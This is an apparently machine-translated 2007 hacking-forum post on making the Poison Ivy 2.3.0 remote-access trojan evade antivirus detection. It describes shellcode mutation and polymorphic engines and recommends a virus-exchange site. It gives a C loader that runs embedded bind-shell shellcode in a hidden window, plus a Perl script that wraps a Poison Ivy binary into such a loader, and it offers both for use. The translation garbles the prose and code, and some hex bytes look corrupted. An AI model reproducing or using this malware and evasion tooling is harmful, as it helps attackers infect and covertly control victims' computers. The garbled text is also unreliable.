About Posion Ivy 2.3.0 free kill points idea-vulnerability warning-the black bar safety net

2007-06-25T00:00:00
ID MYHACK58:62200715912
Type myhack58
Reporter 佚名
Modified 2007-06-25T00:00:00

Description

Originally wanted to send to the original area, but to see other places also have the discussion of, and the method is certainly a lot, so I'll put here, please have a idea of the friends in here big comments! Today in foreign countries, the IRC saw a few foreigners in the discussion of the PI2. 3 offree to kill, due to the PI2. 3 alignment with the past is not quite the same result using the packers after the treatment can not be normal run, so it'sfree to killbecame a concern of the object. So I downloaded a trial a try, plus through the shell do not run out. However, due to the PI2. 3 new features to support the shellcode generated, that would be much easier! shellcode I know Ah, morph, I also know Ah, thatfree killalso not easy?! PI2. 3 support the generation of the binary format of the Data, C-format shellcode, delphi format shellcode, perl-format The and python format. Since I'm more familiar with C format, so take it to discussion about it! Engage through the overflow brother sister brother sister we all know that the shellcode deformation is writing a Trojan is a very important part of, so apply it tofree to killup to, in theory, either through the filefree to killalso can be through memoryfree kill, of course, a simple xor of the deformation is however memory, the need for the shellcode to add the garbage code garbage code to confuse only. On the deformation of the ideas that may more, it is estimated that a post is that unclear. Interested friends can go to some of the more famous virus site find, I'm here to recommend one it: http://vx.netlux.org. This station have many ready-to-deformation tools can be used, their take went to research in the virus, this deformation belonging to the polymorphic engine. I'm here generally to talk about the idea of it, if you are using someone else to write good polymorphic engine is deformed, and the support of the shellcode format of the output words is said above c or delphi, etc. the format of the output, then you're in with a PI 2.3.0 generates a service end time to select the binary generation mode. Thus generated is a binary code, and then use your poly engine modification can such a tool have tapion 1.0 c, in the I said above that the station can be found in. Or direct manual deformation you guys gotta try this good trouble with drops but as an idea I here also proposed, the method is simple to say about it, first manually add the garbage code just like adding flowers instructions a concept, and then further deformation, such as xor A, and so on, the advantage of this approach is that even then was killed then change convenient, the disadvantage needless to say is the first too much trouble do not recommend Oh! Then there are the segments of the deformation, meaning that a section of the deformation, and then put each segment and then re-combined in a different order, of course, the original implementation of anterograde can't change, so you need to add code to these segments are connected together, each section of the form like this: decrpytor(decoding header)+is encrpyted code after modification of the code plus use code to connect to other sections of the code. This way is most most most most trouble, but the deformation strength is the most the most the most the highest! See here and I like the rookie who likely was depressed, this trouble also not want people to live Ah! Hey, Hey~~~I actually was on this swing method?, so I can think of are going to say, just mean trouble. Now say a simple should be very simple, don't say I like. In fact, our most simple way to do this, the generated shellcode into a pe format file, not you can use the extra shell tool to process?!

For example, you generate the C shellcode format, then you can use the following code to generate a PE file is to:

Code Language : C

    1. include <windows. h>

    1. pragma comment(linker, "/MERGE:. rdata=. text /MERGE:. data=. text /SECTION:. text,EWR")

  1. pragma comment(linker,"/subsystem:windows /ENTRY:MyEntry")

  2. pragma comment(linker,"/INCREMENTAL:NO")

    1. int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow);
  3. 1 0. unsigned char PIshellcode[] ="\xD9\xE1\xD9\x34\x24\x58\x58\x58"

1 1. "\x58\x80\xE8\xE7\x31\xC9\x66\x81\xE9\x97\xFE\x80\x30\x92\x40\xE2"

1 2. "\xFA\x7A\xAA\x92\x92\x92\xD1\xDF\xD6\x92\x75\xEB\x54\xEB\x77\xDB"

1 3. "\x14\xDB\x36\x3F\xBC\x7B\x36\x88\xE2\x55\x4B\x9B\x67\x3F\x59\x7F"

1 4. "\x6E\xA9\x1C\xDC\x9C\x7E\xEC\x4A\x70\xE1\x3F\x4B\x97\x5C\xE0\x6C"

1 5. "\x21\x84\xC5\xC1\xA0\xCD\xA1\xA0\xBC\xD6\xDE\xDE\x92\x93\xC9\xC6"

1 6. "\x1B\x77\x1B\xCF\x92\xF8\xA2\xCB\xF6\x19\x93\x19\xD2\x9E\x19\xE2"

1 7. "\x8E\x3F\x19\xCA\x9A\x79\x9E\x1F\xC5\xBE\xC3\xC0\x6D\x42\x1B\x51"

1 8. "\xCB\x79\x82\xF8\x9A\xCC\x93\x7C\xF8\x98\xCB\x19\xEF\x92\x12\x6B"

1 9. "\x94\xE6\x 76\xC3\xC1\x6D\xA6\x1D\x7A\x07\x92\x92\x92\xCB\x1B\x96"

2 0. "\x1C\x70\x79\xA3\x6D\xF4\x13\x7E\x02\x93\xC6\xFA\x93\x93\x92\x92"

2 1. "\x6D\xC7\xB2\xC5\xC5\xC5\xC5\xD5\xC5\xD5\xC5\x6D\xC7\x8E\x1B\x51"

2 2. "\xA3\x6D\xC5\xC5\xFA\x90\x92\x83\xCE\x1B\x74\xF8\x82\xC4\xC1\x6D"

2 3. "\xC7\x8A\xC5\xC1\x6D\xC7\x86\xC5\xC4\xC1\x6D\xC7\x82\x1B\x50\xF4"

2 4. "\x13\x7E\xC6\x92\x1F\xAE\xB6\xA3\x52\xF8\x87\xCB\x61\x39\x1B\x45"

2 5. "\x54\xD6\xB6\x82\xD6\xF4\x55\xD6\xB6\xAE\x93\x93\x1B\xEE\xB6\xDA"

2 6. "\x1B\xEE\xB6\xDE\x1B\xEE\xB6\xC2\x1F\xD6\xB6\x82\xC6\xC2\xC3\xC3"

2 7. "\xC3\xD3\xC3\xDB\xC3\xC3\x6D\xE7\x92\xC3\x6D\xC7\xA2\x1B\x73\x79"

2 8. "\x9C\xFA\x6D\x6D\x6D\x6D\x6D\xA3\x6D\xC7\xBE\xC5\x6D\xC7\x9E\x6D"

2 9. "\xC7\xBA\xC1\xC7\xC4\xC5\x19\xFE\xB6\x8A\x19\xD7\xAE\x19\xC6\x97"

3 0. "\xEA\x93\x78\x19\xD8\x8A\x19\xC8\xB2\x93\x79\x71\xA0\xDB\x19\xA6"

3 1. "\x19\x93\x7C\xA3\x6D\x6E\xA3\x52\x3E\xAA\x72\xE6\x95\x53\x5D\x9F"

3 2. "\x93\x55\x79\x60\xA9\xEE\xB6\x86\xE7\x73\x19\xC8\xB6\x93\x79\xF4"

3 3. "\x19\x9E\xD9\x19\xC8\x8E\x93\x79\x19\x96\x19\x93\x7A\x79\x90\xA3"

3 4. "\x52\x1B\x78\xCD\xCC\xCF\xC9\x50\x9A\x92\x65\x6D\x44\x58\x4F\x52";

3 5. 3 6. int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow)

3 7. {

3 8. __asm{

3 9. lea eax,PIshellcode

4 0. call eax

4 1. }

4 2. return 1;

4 3. }

4 4. 4 5. void MyEntry(void)

4 6. {

4 7. ExitProcess(WinMain(GetModuleHandle(NULL), NULL, GetCommandLine(), SW_HIDE));

4 8. }

4 9. Parsed in 0.032 seconds

The above shellcode is bound to the local port 4 4 4 4, With Your to generate the PI shellcode to replace it. Compiled after the success of the program, you can use the extra shell tool to deal with a you can think offree to killmethod should can be used on. Above I takes into account the volume of the problem, so try to reduce the volume of course there must also be a further reduction Oh, but I can think on these! Originally referred to the shellcode deformation, and finally also to use the above program to generate a PE file, but no longer used tool processing! In order to facilitate everyone from bin format file to generate a text format of the shellcode, and easy for everyone to build the above C code, I wrote a perl script to help you generate perl and c format of the shellcode, the code is as follows:

Code Language : Perl

    1. !/ usr/bin/perl

  1. written by mika[EST]

  2. use strict;

    1. my $BinName=shift || die "Usage: $0 <bin name> (no . bin suffix)\n";
    1. my $bindata;
  3. open(BF, "<$BinName. bin") || exit(0);

1 0. $bindata = join(",<BF>);

1 1. close(BF);

1 2. 1 3. print "+ Length: ". length($bindata) . "bytes\n";

1 4. 1 5. print "+ Generating Perl shellcode file ".$ BinName.". pl ...";

1 6. my $buffer = BufferPerl($bindata);

1 7. open(PF,">$BinName.pl");

1 8. print PF "my \$PlShellcode=".$ buffer;

1 9. close(PF);

2 0. print "Done"."\ n";

2 1. 2 2. print "+ Generating C shellcode file ".$ BinName.". cpp...";

2 3. $buffer = BufferC($bindata);

2 4. my $C_shellcode;

2 5. while(<DATA>) { $C_shellcode .= $_; }

2 6. $C_shellcode =~ s/::SHELLCODE::/$buffer/g;

2 7. open(CF, ">$BinName.cpp");

2 8. print CF $C_shellcode;

2 9. close (CF);

3 0. print "Done"."\ n";

3 1. 3 2. sub BufferPerl

3 3. {

3 4. my ($data, $width) = @_;

3 5. my ($res, $count);

3 6. 3 7. if (! $data) { return }

3 8. if (! $width) { $width = 1 6 }

3 9. 4 0. $res = '"';

4 1. 4 2. $count = 0;

4 3. foreach my $char (split(//, $data))

4 4. {

4 5. if ($count == $width)

4 6. {

4 7. $res .= '".' . "\n" . '"';

4 8. $count = 0;

4 9. }

5 0. $res .= sprintf("\\x%. 2x", ord($char));

5 1. $count++;

5 2. }

5 3. if ($count) { $res .= '";' . "\n"; }

5 4. return $res;

5 5. }

5 6. 5 7. sub BufferC

5 8. {

5 9. my ($data, $width) = @_;

6 0. my $res = BufferPerl($data, $width);

6 1. if (! $res) { return }

6 2. 6 3. $res =~ s/\.// g;

6 4. return $res;

6 5. }

6 6. 6 7. DATA

6 8. 6 9. #include <windows. h>

7 0. 7 1. #pragma comment(linker, "/MERGE:. rdata=. text /MERGE:. data=. text /SECTION:. text,EWR")

7 2. #pragma comment(linker,"/subsystem:windows /ENTRY:MyEntry")

7 3. #pragma comment(linker,"/INCREMENTAL:NO")

7 4. 7 5. int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow);

7 6. char PIshellCode[] =

7 7. ::SHELLCODE::

7 8. 7 9. int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow)

8 0. {

8 1. __asm{

8 2. lea eax,PIshellcode

8 3. call eax

8 4. }

8 5. return 1;

8 6. }

8 7. 8 8. void MyEntry(void)

8 9. {

9 0. ExitProcess(WinMain(GetModuleHandle(NULL), NULL, GetCommandLine(), SW_HIDE));

9 1. }

9 2. 9 3. Parsed in 0.056 seconds

This app is simple to use, such as you in generating the PI 2.3.0 service end time select the Generate binary format, for example called test. bin. Put to the test. bin is copied to this perl program in the same directory, and then in the cmd the following input: perl bin2shellcode.pl test You can not. bin suffix, so that the program will be in the same directory generates two files, one is. pl suffix to the perl file, which is perl-format shellcode, another is. cpp suffix C++file, which not only generates a nice shellcode and the program directly to help you generate a c++program, you directly get to the VC under compile, the generated cpp file as follows:

Code Language : C

      1. include <windows. h>

    1. pragma comment(linker, "/MERGE:. rdata=. text /MERGE:. data=. text /SECTION:. text,EWR")

  1. pragma comment(linker,"/subsystem:windows /ENTRY:MyEntry")

  2. pragma comment(linker,"/INCREMENTAL:NO")

    1. int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow);

1 0. char PIshellCode[] =

1 1. "\x55\x8b\xec\x81\xc4\x3c\xf2\xff\xff\x60\x33\xc0\x8d\xbd\x90\xf2"

1 2. "\xff\xff\xb9\x5b\x0d\x00\x00\xf3\xaa\x33\xc0\x8d\xbd\x4c\xf2\xff"

1 3. "\xff\xb9\x44\x00\x00\x00\xf3\xaa\xc7\x85\xb9\xf3\xff\xff\xe6\x00"

1 4. //........................... Omitted shellcode several

1 5. "\x04\x00\x74\x65\x73\x74\xf9\x0b\x04\x00\x74\x65\x6d\x70\x90\x01"

1 6. "\x0d\x00\x09\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x00\x84\x0d\x8c"

1 7. "\x01\x04\x00\x00\x00\x00\x00\xc1\x02\x04\x00\xff\xff\xff\xff\x45"

1 8. "\x01\x05\x00\x61\x64\x6d\69\x6e\xfb\x03\x09\x00\x29\x21\x56\x6f"

1 9. "\x71\x41\x2e\x49\x34\x00\x00\x00\x00";

2 0. 2 1. 2 2. int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int iCmdShow)

2 3. {

2 4. __asm{

2 5. lea eax,PIshellcode

2 6. call eax

2 7. }

2 8. return 1;

2 9. }

3 0. 3 1. void MyEntry(void)

3 2. {

3 3. ExitProcess(WinMain(GetModuleHandle(NULL), NULL, GetCommandLine(), SW_HIDE));

3 4. }

3 5. 3 6. Parsed in 0.015 seconds

Simple right? My idea will say to this, here the forum You guys talk about Oh! !

PS:today's Fall, the knees knock a large sub, sew several needles, good pain Ah!